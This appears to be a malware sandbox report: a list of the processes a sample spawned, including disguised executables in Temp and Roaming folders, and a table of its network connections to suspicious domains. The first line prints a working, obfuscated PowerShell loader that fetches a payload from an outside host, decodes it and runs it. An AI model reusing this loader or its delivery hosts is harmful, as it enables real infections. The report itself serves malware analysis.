powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AaQBpAGcAZwBnAGsAawBsAC4AbQBvAG4AcwB0AGUAcgAvAG4AZQB3AGQAcgBvAHAALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=
C:\Users\Admin\AppData\Local\Temp\Ko0JPYBqUfWBZzu\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\Ko0JPYBqUfWBZzu\svchost.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3456 -ip 3456
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2496 -ip 2496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 2056
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 2064
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3456 -ip 3456
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2496 -ip 2496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 2060
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\scdaemon.exe
"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\scdaemon.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x2cc,0x2d0,0x2d4,0x2c8,0x2c4,0x7ff8a4342e98,0x7ff8a4342ea4,0x7ff8a4342eb0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2332 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2376 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=2496 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3400 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3464 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --extension-process --renderer-sub-type=extension --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4048 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4996 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=5016 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4908 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5284 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5044 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5204 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=4996 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5824 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5824 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=6108 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5416 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6472 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6476 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6084 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x248,0x7ff8a4342e98,0x7ff8a4342ea4,0x7ff8a4342eb0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2288 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2324 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3064 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --extension-process --renderer-sub-type=extension --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3268 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4768 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4768 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3892 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4420 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=5140 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5180 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5536 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5528 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5560 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 21.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 142.250.179.234:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | thecurl.monster | udp |
| US | 172.67.176.123:80 | thecurl.monster | tcp |
| US | 172.67.176.123:443 | thecurl.monster | tcp |
| US | 8.8.8.8:53 | 123.176.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | death1488.com | udp |
| US | 172.67.151.174:80 | death1488.com | tcp |
| US | 8.8.8.8:53 | 174.151.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | the.earth.li | udp |
| US | 8.8.8.8:53 | iigggkkl.monster | udp |
| US | 188.114.97.2:443 | iigggkkl.monster | tcp |
| GB | 93.93.131.124:443 | the.earth.li | tcp |
| US | 8.8.8.8:53 | 2.97.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.131.93.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.13.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raur94.com | udp |
| US | 104.21.68.134:80 | raur94.com | tcp |
| US | 104.21.68.134:443 | raur94.com | tcp |
| US | 8.8.8.8:53 | 134.68.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkass.monster | udp |
| US | 104.21.2.229:443 | checkass.monster | tcp |
| US | 8.8.8.8:53 | 229.2.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| GB | 142.250.180.3:443 | update.googleapis.com | tcp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| GB | 142.250.180.3:443 | update.googleapis.com | tcp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| US | 8.8.8.8:53 | 10.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| GB | 2.17.5.133:443 | www.microsoft.com | tcp |
| GB | 51.11.108.188:443 | nav-edge.smartscreen.microsoft.com | tcp |
| GB | 51.11.108.188:443 | nav-edge.smartscreen.microsoft.com | tcp |
| GB | 51.11.108.188:443 | nav-edge.smartscreen.microsoft.com | tcp |
| GB | 2.17.5.133:443 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| FR | 13.105.221.27:443 | edge-mobile-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| GB | 88.221.135.81:443 | bzib.nelreports.net | tcp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| US | 8.8.8.8:53 | 27.221.105.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 216.58.201.97:443 | clients2.googleusercontent.com | udp |
| GB | 216.58.201.97:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | 133.5.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.104.245.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.s-microsoft.com | udp |
| US | 8.8.8.8:53 | c.s-microsoft.com | udp |
| US | 8.8.8.8:53 | edgestatic.azureedge.net | udp |
| US | 8.8.8.8:53 | edgestatic.azureedge.net | udp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| GB | 92.123.128.155:443 | www.bing.com | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 8.8.8.8:53 | 155.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jspm.dev | udp |
| US | 8.8.8.8:53 | jspm.dev | udp |
| US | 205.234.175.175:443 | jspm.dev | tcp |
| US | 205.234.175.175:443 | jspm.dev | tcp |
| US | 8.8.8.8:53 | 175.175.234.205.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blockchain.info | udp |
| US | 8.8.8.8:53 | blockchain.info | udp |
| US | 104.17.138.37:443 | blockchain.info | tcp |
| US | 8.8.8.8:53 | 37.138.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dark-confusion.com | udp |
| US | 8.8.8.8:53 | dark-confusion.com | udp |
| US | 188.114.96.2:443 | dark-confusion.com | tcp |
| US | 188.114.96.2:443 | dark-confusion.com | tcp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | 2.96.114.188.in-addr.arpa | udp |
| US | 188.114.96.2:443 | dark-confusion.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| GB | 92.123.128.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | wcpstatic.microsoft.com | udp |
| US | 8.8.8.8:53 | wcpstatic.microsoft.com | udp |
| US | 8.8.8.8:53 | edgestatic.azureedge.net | udp |
| US | 8.8.8.8:53 | edgestatic.azureedge.net | udp |
| US | 13.107.246.64:443 | wcpstatic.microsoft.com | tcp |
| US | 8.8.8.8:53 | edgestatic.azureedge.net | udp |
| FR | 13.105.221.27:443 | edgestatic.azureedge.net | tcp |
| FR | 13.105.221.27:443 | edgestatic.azureedge.net | tcp |
| FR | 13.105.221.27:443 | edgestatic.azureedge.net | tcp |
| GB | 92.123.128.184:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 184.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 92.123.128.184:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | 46.28.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.143.182.52.in-addr.arpa | udp |
| GB | 2.17.5.133:443 | www.microsoft.com | tcp |
| GB | 92.123.128.152:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | 152.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 2.17.5.133:443 | www.microsoft.com | tcp |
| GB | 92.123.128.152:443 | www.bing.com | udp |
| US | 172.67.151.174:80 | death1488.com | tcp |
| GB | 93.93.131.124:443 | the.earth.li | tcp |
| US | 172.67.151.174:80 | death1488.com | tcp |
| US | 188.114.97.2:443 | dark-confusion.com | tcp |
| US | 104.21.68.134:80 | raur94.com | tcp |
| US | 104.21.68.134:443 | raur94.com | tcp |
| GB | 2.17.5.133:443 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | death1488.com | udp |
| US | 172.67.151.174:80 | death1488.com | tcp |
| GB | 93.93.131.124:443 | the.earth.li | tcp |
| GB | 93.93.131.124:443 | the.earth.li | tcp |
